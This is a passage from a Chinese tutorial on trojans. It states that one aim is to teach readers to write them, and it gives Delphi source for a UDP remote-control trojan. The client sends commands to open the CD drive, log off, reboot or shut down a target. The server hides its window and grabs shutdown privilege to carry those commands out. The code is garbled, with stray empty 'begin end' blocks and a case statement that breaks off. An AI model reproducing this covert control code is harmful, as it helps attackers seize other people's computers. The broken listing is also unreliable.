后面的文章将详细讨论关于木马、远程控制软件和病毒(严格意义上的病毒并不包含木马程序)的一些异同,以及合法程序改造成木马、嵌套木马等问题;
目的是希望大家了解木马、熟悉木马技术,破除神秘感,能够手工清除木马,甚至能够编写木马程序------知己知彼,百战不殆。
-------------------------------------------------------------------
§控制端§
§发现未知病毒§
Client端源码:
//----------------------------------------------------------------
//
//
//
//
unit MainFrm;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls, IdBaseComponent, IdComponent, IdUDPBase, IdUDPClient;
type
TfrmMain = class(TForm)
edtHost: TEdit;
edtPort: TEdit;
lblHost: TLabel;
Label2: TLabel;
btnOpen_CDROM: TButton;
btnClose_CDROM: TButton;
btnLoginOff: TButton;
btnReboot: TButton;
btnShutDown: TButton;
lblCmd: TLabel;
edtCmd: TEdit;
IdUDPClient1: TIdUDPClient;
procedure btnOpen_CDROMClick(Sender: TObject);
procedure btnClose_CDROMClick(Sender: TObject);
procedure btnLoginOffClick(Sender: TObject);
procedure btnRebootClick(Sender: TObject);
procedure btnShutDownClick(Sender: TObject);
private
procedure SendCmd(AHost, APort, CmdStr:string);
//声明:发送命令共用过程
{ Private declarations }
public
{ Public declarations }
end;
var
frmMain: TfrmMain;
implementation
{$R *.dfm}
procedure TfrmMain.SendCmd(AHost, APort, CmdStr:string);
//实现:发送命令共用过程
begin
IdUDPClient1.Host:=AHost;
IdUDPClient1.Port:=StrToInt(APort);
IdUDPClient1.Send(CmdStr);
end;
begin
end;
procedure TfrmMain.btnOpen_CDROMClick(Sender: TObject);
//打开光驱
begin
SendCmd(edtHost.Text, edtPort.Text, 'Open_CDROM');
end;
begin
end;
procedure TfrmMain.btnClose_CDROMClick(Sender: TObject);
//关闭光驱
begin
SendCmd(edtHost.Text, edtPort.Text, 'Close_CDROM');
end;
begin
end;
procedure TfrmMain.btnLoginOffClick(Sender: TObject);
//注销
begin
SendCmd(edtHost.Text, edtPort.Text, 'LoginOff');
end;
begin
end;
procedure TfrmMain.btnRebootClick(Sender: TObject);
//重启
begin
SendCmd(edtHost.Text, edtPort.Text, 'Reboot');
end;
begin
end;
procedure TfrmMain.btnShutDownClick(Sender: TObject);
//关机
begin
SendCmd(edtHost.Text, edtPort.Text, 'ShutDown');
end;
begin
end;
end.
//----------------------------------------------------------------
Server端源码:
注:在工程文件的 Application.Run; 语句前添加Application.ShowMainForm:=False; 语句以使程序运行时隐藏窗体;
并创建互斥对象,避免二次运行;
//----------------------------------------------------------------
//
//
//
//
unit MainFrm;
interface
uses
Windows, Messages,
SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, IdBaseComponent, IdComponent, IdUDPBase, IdUDPServer, IdSocketHandle,
MMSystem, ShellAPI;
type
TfrmMain = class(TForm)
IdUDPServer1: TIdUDPServer;
procedure IdUDPServer1UDPRead(Sender: TObject; AData: TStream;
ABinding: TIdSocketHandle);
private
procedure GetPrivilege;
//声明:获取登录用户权限
{ Private declarations }
public
{ Public declarations }
end;
var
frmMain: TfrmMain;
implementation
{$R *.dfm}
procedure TfrmMain.GetPrivilege;
//获取登录用户权限
var
NewState:TTokenPrivileges;
lpLuid:Int64;
ReturnLength:DWord;
ToKenHandle:Cardinal;
begin
OpenProcessToken(GetCurrentProcess,
TOKEN_ADJUST_PRIVILEGES
OR TOKEN_ALL_ACCESS
OR STANDARD_RIGHTS_REQUIRED
OR TOKEN_QUERY,ToKenHandle);
LookupPrivilegeValue(nil,'SeShutdownPrivilege',lpLuid);
NewState.PrivilegeCount:=1;
NewState.Privileges[0].Luid:=lpLuid;
NewState.Privileges[0].Attributes:=SE_PRIVILEGE_ENABLED;
ReturnLength:=0;
AdjustTokenPrivileges(ToKenHandle,False,NewState,0,nil,ReturnLength);
end;
var
begin
end;
procedure TfrmMain.IdUDPServer1UDPRead(Sender: TObject; AData: TStream;
//读取内存流数据
ABinding: TIdSocketHandle);
var
ReadCmd:TStringList;
//定义接受命令字符串列表
CmdList:TStringList;
//定义命令列表
begin
ReadCmd:=TStringList.Create;
//创建接受命令字符串列表
CmdList:=TStringList.Create;
//创建命令字符串列表
try
CmdList.Add('Open_CDROM');
CmdList.Add('Close_CDROM');
CmdList.Add('LoginOff');
CmdList.Add('Reboot');
CmdList.Add('ShutDown');
ReadCmd.LoadFromStream(AData);
//从内存流中取得数据
case CmdList.IndexOf(ReadCmd.Strings[0]) of
0: mciSendString('Set CDAudio door open wait',nil,0,handle);
//打开光驱
var
begin
end;
end.
//----------------------------------------------------------------